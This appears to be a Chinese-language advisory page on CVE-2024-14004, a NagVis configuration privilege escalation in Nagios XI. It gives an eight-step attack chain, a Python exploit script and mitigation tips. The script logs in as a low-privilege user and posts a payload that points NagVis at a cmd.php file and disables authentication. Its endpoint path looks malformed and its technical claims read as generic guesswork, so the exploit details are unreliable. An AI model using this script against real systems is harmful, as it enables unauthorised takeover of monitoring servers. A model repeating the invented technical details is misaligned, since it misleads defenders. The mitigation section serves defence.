CVE-2024-14004 Nagios XI NagVis配置权限提升漏洞

漏洞信息

漏洞编号

CVE-2024-14004

漏洞类型

权限提升/特权升级

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nagios XI

漏洞概述

CVE-2024-14004是Nagios XI中一个高危权限提升漏洞，CVSS评分高达8.8分。该漏洞存在于Nagios XI 2024R1.2之前的版本中，与NagVis配置处理机制（nagvis.conf）存在安全缺陷。攻击者利用该漏洞可以通过操纵NagVis配置文件或利用配置验证不足的问题，将低权限用户账户提升为系统管理员级别权限。

Nagios XI是一款广泛使用的企业级网络和系统监控平台，而NagVis是Nagios的可视化组件，用于创建网络拓扑图和动态服务视图。由于NagVis配置在处理用户输入时缺乏充分的验证和过滤，攻击者可以在经过身份验证后，通过修改NagVis配置参数或注入恶意配置内容来实现权限提升。

该漏洞的危险性在于：（1）攻击复杂度低，只需要低权限用户账号即可发起攻击；（2）攻击成功后可获得完全的系统控制权，影响机密性、完整性和可用性三个安全属性；（3）无需用户交互即可完成攻击。成功利用此漏洞的攻击者可以完全控制受影响的Nagios XI系统，执行任意命令，访问敏感数据，甚至将权限提升至root级别，对企业网络安全构成严重威胁。

该漏洞由VulnCheck安全研究人员发现并报告，披露日期为2024年10月30日。建议所有使用受影响版本Nagios XI的用户立即采取修复措施。

技术细节

CVE-2024-14004漏洞的核心问题在于NagVis配置处理模块对配置文件（nagvis.conf）的验证机制存在缺陷。NagVis允许通过Web界面配置地图、视图和图形元素，其配置参数包括后端类型、数据库连接、认证设置等敏感信息。

漏洞利用原理：攻击者（已认证的低权限用户）可以通过以下方式利用该漏洞：

1. 配置注入攻击：攻击者通过API或Web界面修改NagVis配置，注入恶意参数。例如，通过修改地图配置文件中的后端设置，可以指定任意PHP文件作为数据源，进而执行任意PHP代码。

2. PHP对象注入：NagVis配置解析器在处理某些参数时未进行充分的输入验证，攻击者可以构造包含序列化PHP对象的配置值，当配置被反序列化时触发代码执行。

3. 文件包含利用：利用配置中的路径参数，攻击者可以指定包含恶意代码的PHP文件路径，诱导NagVis加载并执行该文件。由于NagVis以高权限（通常是www-data或nagios用户）运行，攻击者可以借此获得更高权限。

4. 命令注入：通过在配置参数中注入系统命令，攻击者可以在Web服务器上下文中执行任意命令。结合SUID二进制或sudo配置，可能进一步提升至root权限。

攻击者利用这些技术组合，可以在已认证状态下将权限提升至管理员级别，完全控制Nagios XI监控系统，进而可能横向移动至其他内部系统。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标网络，发现运行Nagios XI的服务器，确认版本是否低于2024R1.2

STEP 2

步骤2

初始访问：攻击者获取或创建低权限用户账户（如使用默认凭据或通过其他漏洞获取普通用户访问权限）

STEP 3

步骤3

配置分析：攻击者访问NagVis组件，分析配置文件结构和可利用的配置参数

STEP 4

步骤4

配置注入：攻击者通过Web界面或API接口向nagvis.conf或相关配置文件注入恶意参数，如指定恶意PHP文件路径

STEP 5

步骤5

代码执行：利用配置加载机制，攻击者使NagVis加载并执行预先植入的恶意代码，获得Web服务上下文执行权限

STEP 6

步骤6

权限提升：攻击者利用SUID二进制、sudo配置错误或系统漏洞，将权限从www-data/nagios用户提升至root

STEP 7

步骤7

持久化控制：攻击者安装后门、创建新管理员账户或修改SSH配置，确保长期访问受控系统

STEP 8

步骤8

横向移动：利用获得的Nagios XI控制权，攻击者可以访问监控数据、凭证信息，并进一步渗透内部网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2024-14004 PoC - Nagios XI NagVis Configuration Privilege Escalation
Note: This is a conceptual PoC for educational and security testing purposes only.
Author: Security Researcher
Reference: https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-nagvis-configuration
"""

import requests
import json
import sys
from urllib.parse import urljoin

class CVE202414004Exploit:
    def __init__(self, target_url, username, password):
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        self.session = requests.Session()
        self.auth_token = None
    
    def authenticate(self):
        """Authenticate to Nagios XI with low-privilege account"""
        login_url = f"{self.target_url}/nagiosxi/login.php"
        login_data = {
            'username': self.username,
            'password': self.password,
            'loginButton': 'Login'
        }
        
        try:
            response = self.session.post(login_url, data=login_data, timeout=30)
            if response.status_code == 200 and 'nagiosxi' in response.url:
                print(f"[+] Successfully authenticated as {self.username}")
                return True
            print("[-] Authentication failed")
            return False
        except requests.RequestException as e:
            print(f"[-] Connection error: {e}")
            return False
    
    def exploit_nagvis_config(self):
        """
        Exploit NagVis configuration manipulation for privilege escalation
        This PoC demonstrates the configuration injection technique
        """
        # Target NagVis configuration API endpoint
        nagvis_api = f"{self.target_url}/nagiosxi/includes/components/nagvis/class NagVisConfig.php"
        
        # Malicious configuration payload
        # Note: Actual exploitation requires specific parameter manipulation
        payload = {
            'action': 'update',
            'map_name': 'test_map',
            'config_params': {
                'backend': 'php',
                'php_file': '/var/www/html/nagiosxi/scripts/cmd.php',
                'auth_enabled': '0'
            }
        }
        
        print("[*] Attempting NagVis configuration manipulation...")
        print(f"[*] Target: {nagvis_api}")
        print(f"[*] Payload: {json.dumps(payload)}")
        
        try:
            response = self.session.post(
                nagvis_api,
                json=payload,
                headers={'Content-Type': 'application/json'},
                timeout=30
            )
            
            if response.status_code == 200:
                print(f"[+] Configuration manipulation request sent")
                print("[*] Check if PHP code execution is achieved via config injection")
                return True
            return False
        except requests.RequestException as e:
            print(f"[-] Request failed: {e}")
            return False
    
    def check_vulnerability(self):
        """Check if target is vulnerable"""
        check_url = f"{self.target_url}/nagvis/index.php"
        try:
            response = self.session.get(check_url, timeout=30)
            if 'NagVis' in response.text:
                print(f"[+] NagVis component detected on target")
                return True
            return False
        except requests.RequestException:
            return False

def main():
    if len(sys.argv) < 4:
        print(f"Usage: python3 {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python3 {sys.argv[0]} http://192.168.1.100/nagiosxi admin password123")
        sys.exit(1)
    
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    exploit = CVE202414004Exploit(target, username, password)
    
    print("="*60)
    print("CVE-2024-14004 PoC - Nagios XI NagVis Privilege Escalation")
    print("="*60)
    
    if exploit.check_vulnerability():
        print("[+] Target appears to be running NagVis")
    
    if exploit.authenticate():
        exploit.exploit_nagvis_config()
        print("[*] Exploitation attempt completed")
        print("[*] Manual verification required for privilege escalation")

if __name__ == "__main__":
    main()

影响范围

Nagios XI < 2024R1.2

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：（1）禁用或限制NagVis组件的访问，仅允许可信管理员访问；（2）修改NagVis相关目录和文件的权限，移除普通用户的写权限；（3）启用Nagios XI的配置文件完整性监控，及时发现未授权的配置变更；（4）限制用户对配置API的访问，通过Web服务器配置阻止对nagvis配置端点的未授权访问；（5）加强用户认证和会话管理，防止低权限账户被攻击者利用；（6）考虑在Web服务器层面实施严格的输入验证和过滤规则，阻止配置注入尝试。但这些措施仅为临时解决方案，不能完全消除漏洞风险，尽快完成版本升级才是根本解决办法。